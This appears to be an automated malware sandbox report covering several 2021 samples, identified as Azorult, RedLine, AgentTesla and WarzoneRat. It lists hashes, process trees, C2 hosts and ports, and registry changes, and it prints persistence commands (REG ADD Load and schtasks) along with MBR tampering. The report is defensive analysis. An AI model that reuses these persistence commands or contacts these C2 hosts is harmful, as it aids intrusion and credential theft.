memory/2828-264-0x0000000000000000-mapping.dmp
memory/2840-265-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Roaming\Templers\exe1.exe
| MD5 | eaee663dfeb2efcd9ec669f5622858e2 |
| SHA1 | 2b96f0d568128240d0c53b2a191467fde440fd93 |
| SHA256 | 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2 |
| SHA512 | 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3 |
Analysis: behavioral3
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:31
Platform
debian9-mipsbe
Max time kernel
0s
Max time network
46s
Command Line
Signatures
Processes
./0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901
[./0f56c5738ae435abeac7a0928a5de2ff5d4082370c43f257a4c0589212f08901]
Network
| Country | Destination | Domain | Proto |
| N/A | 1.1.1.1:53 | 2.debian.pool.ntp.org | udp |
| N/A | 1.1.1.1:53 | 2.debian.pool.ntp.org | udp |
| N/A | 1.1.1.1:53 | 3.debian.pool.ntp.org | udp |
| N/A | 1.1.1.1:53 | 3.debian.pool.ntp.org | udp |
| N/A | 185.238.130.233:123 | 3.debian.pool.ntp.org | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
123s
Max time network
157s
Command Line
Signatures
Azorult
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1924 set thread context of 908 | N/A | C:\Users\Admin\AppData\Local\Temp\219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe | C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe
"C:\Users\Admin\AppData\Local\Temp\219156c02502e38cfd6273b4293f737b8404c043de6df402b322e813f3a223f0.exe"
C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe
C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | cskbtr.atspace.co.uk | udp |
| N/A | 185.176.43.84:80 | cskbtr.atspace.co.uk | tcp |
Files
memory/1924-59-0x0000000000980000-0x0000000000981000-memory.dmp
memory/1924-61-0x0000000076691000-0x0000000076693000-memory.dmp
memory/1924-62-0x0000000004D20000-0x0000000004D21000-memory.dmp
\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe
| MD5 | ed797d8dc2c92401985d162e42ffa450 |
| SHA1 | 0f02fc517c7facc4baefde4fe9467fb6488ebabe |
| SHA256 | b746362010a101cb5931bc066f0f4d3fc740c02a68c1f37fc3c8e6c87fd7cb1e |
| SHA512 | e831a6ff987f3ef29982da16afad06938b68eddd43c234ba88d1c96a1b5547f2284baf35cbb3a5bfd75e7f0445d14daa014e0ba00b4db72c67f83f0a314c80c2 |
memory/908-65-0x000000000041A684-mapping.dmp
memory/908-64-0x0000000000400000-0x0000000000420000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\windowsmediaplayer.exe
| MD5 | ed797d8dc2c92401985d162e42ffa450 |
| SHA1 | 0f02fc517c7facc4baefde4fe9467fb6488ebabe |
| SHA256 | b746362010a101cb5931bc066f0f4d3fc740c02a68c1f37fc3c8e6c87fd7cb1e |
| SHA512 | e831a6ff987f3ef29982da16afad06938b68eddd43c234ba88d1c96a1b5547f2284baf35cbb3a5bfd75e7f0445d14daa014e0ba00b4db72c67f83f0a314c80c2 |
memory/908-67-0x0000000000400000-0x0000000000420000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210408
Max time kernel
150s
Max time network
185s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1976 set thread context of 1520 | N/A | C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe | C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
"C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe"
C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
C:\Users\Admin\AppData\Local\Temp\36ef5e0db18469267810503ba4fd099e59007c3f10f718bccffdc93e87a853a0.exe
Network
| Country | Destination | Domain | Proto |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp | |
| N/A | 46.8.19.196:53773 | tcp |
Files
memory/1976-60-0x0000000000E30000-0x0000000000E31000-memory.dmp
memory/1976-62-0x00000000049A0000-0x00000000049A1000-memory.dmp
memory/1976-63-0x0000000000230000-0x0000000000238000-memory.dmp
memory/1520-64-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1520-65-0x0000000000417E2A-mapping.dmp
memory/1520-66-0x0000000000400000-0x000000000041E000-memory.dmp
memory/1520-68-0x00000000043C0000-0x00000000043C1000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win10v20210410
Max time kernel
138s
Max time network
127s
Command Line
Signatures
AgentTesla
AgentTesla Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\kprUEGC = "C:\\Users\\Admin\\AppData\\Roaming\\kprUEGC\\kprUEGC.exe" | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4448 set thread context of 8 | N/A | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe
"C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qqUYUQOSj" /XML "C:\Users\Admin\AppData\Local\Temp\tmp151F.tmp"
C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe
"C:\Users\Admin\AppData\Local\Temp\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe"
Network
Files
memory/4448-114-0x0000000000260000-0x0000000000261000-memory.dmp
memory/4448-116-0x0000000005120000-0x0000000005121000-memory.dmp
memory/4448-117-0x0000000004C20000-0x0000000004C21000-memory.dmp
memory/4448-118-0x0000000004D00000-0x0000000004D01000-memory.dmp
memory/4448-119-0x0000000004DE0000-0x0000000004DE1000-memory.dmp
memory/4448-120-0x0000000004C00000-0x0000000004C01000-memory.dmp
memory/4448-121-0x00000000050F0000-0x000000000510B000-memory.dmp
memory/4448-122-0x00000000082C0000-0x0000000008340000-memory.dmp
memory/4448-123-0x0000000008340000-0x000000000837C000-memory.dmp
memory/4044-124-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\tmp151F.tmp
| MD5 | a0431904b36f4d37db3b03b5a92428b1 |
| SHA1 | a9e157e9cfdd610dd676298b0a56f7267ae4c243 |
| SHA256 | 5944b85d71fd75b69e030e59646283d0d388abac5d2c632f54210d8942c84f89 |
| SHA512 | 933107ebcd47846c9860967724408003f83fe138024e864f72fb169c0a1291d531541fd9c00a0f6c3f1a48971f6be7a07bc31ae21445dcc914736723fcf0cca7 |
memory/8-126-0x0000000000400000-0x000000000043C000-memory.dmp
memory/8-127-0x000000000043763E-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\4072fc745ae1b976bfff8fdfdebdac6db5e33bb4f63507b4d56ab67b98c6db65.exe.log
| MD5 | 0c2899d7c6746f42d5bbe088c777f94c |
| SHA1 | 622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1 |
| SHA256 | 5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458 |
| SHA512 | ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078 |
memory/8-133-0x00000000012F0000-0x00000000012F1000-memory.dmp
memory/8-134-0x0000000005730000-0x0000000005731000-memory.dmp
memory/8-135-0x0000000005DF0000-0x0000000005DF1000-memory.dmp
memory/8-138-0x00000000012F1000-0x00000000012F2000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:33
Platform
win7v20210410
Max time kernel
69s
Max time network
198s
Command Line
Signatures
WarzoneRat, AveMaria
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1644 set thread context of 1040 | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe |
| PID 796 set thread context of 1132 | N/A | C:\ProgramData\images.exe | C:\Users\Admin\AppData\Local\Temp\images.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | N/A |
| N/A | N/A | C:\ProgramData\images.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\ProgramData\images.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\images.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
"C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe"
C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
C:\Users\Admin\AppData\Local\Temp\662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a.exe
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\ProgramData\images.exe
"C:\ProgramData\images.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /f /v Load /t REG_SZ /d "C:\ProgramData\images.exe"
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Users\Admin\AppData\Local\Temp\images.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | dfdgdsasedw.ydns.eu | udp |
| N/A | 203.159.80.165:34566 | dfdgdsasedw.ydns.eu | tcp |
Files
memory/1644-59-0x0000000000FB0000-0x0000000000FB1000-memory.dmp
memory/1644-61-0x00000000766D1000-0x00000000766D3000-memory.dmp
memory/1644-62-0x0000000004D50000-0x0000000004D51000-memory.dmp
memory/1644-63-0x0000000004D55000-0x0000000004D66000-memory.dmp
memory/1644-64-0x0000000000D70000-0x0000000000DBE000-memory.dmp
memory/1644-69-0x0000000005580000-0x00000000055E7000-memory.dmp
memory/1040-71-0x0000000000405E28-mapping.dmp
memory/1040-70-0x0000000000400000-0x000000000055E000-memory.dmp
memory/1040-73-0x0000000000400000-0x000000000055E000-memory.dmp
memory/812-74-0x0000000000000000-mapping.dmp
\ProgramData\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
memory/796-76-0x0000000000000000-mapping.dmp
C:\ProgramData\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
C:\ProgramData\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
memory/796-79-0x0000000000A10000-0x0000000000A11000-memory.dmp
memory/1096-81-0x0000000000000000-mapping.dmp
memory/796-82-0x0000000004D40000-0x0000000004D41000-memory.dmp
memory/796-83-0x0000000004D45000-0x0000000004D56000-memory.dmp
\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
memory/1132-92-0x0000000000405E28-mapping.dmp
memory/1132-95-0x0000000000400000-0x000000000055E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\images.exe
| MD5 | 40cc8249b0f31d6e1c0065aab24007b1 |
| SHA1 | f73e02ad09976ade8985ec833c5743dc387c9687 |
| SHA256 | 662fbe23c87844a881ca233876ff75ee05ddf2ac0a1b5546fb5bc7603474860a |
| SHA512 | 0d7cc1d3bd30c7c5d2b549c5dd9fe332b95b5947637e8b00fd0790ff4ee6bb222fa3267b60779782a3f1c18e28b1f004f321008fc018c986db36fe37dc44d351 |
memory/1532-97-0x0000000000000000-mapping.dmp
memory/1132-99-0x00000000036F0000-0x00000000037F0000-memory.dmp
memory/1532-98-0x0000000000160000-0x0000000000161000-memory.dmp
Analysis: behavioral27
Detonation Overview
Submitted
2021-07-30 15:26
Reported
2021-07-30 15:34
Platform
win10v20210410
Max time kernel
128s
Max time network
117s
Command Line
Signatures
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ViJoy.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Templers\exe1.exe | N/A |
| N/A | N/A | C:\Users\Public\Documents\Wondershare\NFWCHK.exe | N/A |
Modifies RDP port number used by Windows
Sets DLL path for service in the registry
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Roaming\Templers\exe2.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ioi34byk.iwq.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85D2.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_vaeiksoi.ivg.psm1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8591.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85B1.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85C2.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85D3.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
